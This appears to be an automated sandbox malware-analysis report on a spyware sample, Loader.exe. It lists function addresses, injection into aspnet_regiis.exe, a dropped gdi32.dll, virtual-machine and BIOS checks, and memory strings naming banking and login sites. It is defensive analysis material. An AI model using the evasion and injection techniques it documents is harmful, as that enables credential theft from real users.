                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3EB60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE34B60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE41360
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE42B60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE36350
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE48350
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE27F20
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE39320
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE35720
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4C330
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3CB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C69280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C41227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3B100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3E687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C68EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3CE45
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C38600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C457C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C57440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C70460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6C5A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C51D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C70D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C49AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C542D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C69A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C58ABC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C65A4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6DA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C34270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4E220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C373D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C583D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C34BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C51340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5F377
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C39310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C48B1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C338C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5A0CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C638D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C460E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C688B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3C840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4D003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3D021
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3D83C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C709E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5C9EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5E180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C591AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C539B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C36160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4E960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C48169
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C35900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C56910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C546D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C706F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C32EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C68650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5EE63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C52E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C50E6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5FE74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3F60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4961B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4E630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C39780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C57740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4DF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C46F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C55F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C59739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C504C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C524E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C3D4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C61CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C44CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6A440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C4747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C63C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C35DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6A5D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C365F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C67DA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5CD4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5CD5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C54560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C56D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C41D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C69D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C5C53C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 72C37F60 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 72C44C90 appears 77 times
                Source: Loader.exe, 00000000.00000000.2011203087.0000000000BE4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMadisonBenjaminGrace.exerMbT vs Loader.exe
                Source: Loader.exe, 00000000.00000002.2016433799.000000000105E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Loader.exe
                Source: Loader.exe | Binary or memory string: OriginalFilenameMadisonBenjaminGrace.exerMbT vs Loader.exe
                Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/2@11/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C69280 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Roaming\gdi32.dll
                Source: C:\Users\user\Desktop\Loader.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                Source: Loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Loader.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Loader.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: aspnet_regiis.exe, 00000003.00000003.2104540811.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104646012.0000000005C08000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exe | Virustotal: Detection: 48%
                Source: Loader.exe | ReversingLabs: Detection: 70%
                Source: unknown | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: version.dll
                Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: Loader.exe | Static PE information: section name: .text entropy: 7.116320721076053
                Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Roaming\gdi32.dll
                Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 2D20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 2FA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Loader.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Loader.exe TID: 5456 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6696 | Thread sleep time: -150000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE53460 FindFirstFileExW
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128539472.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243161469.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2177101294.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243002308.000000000351C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2197972642.0000000003577000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128539472.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
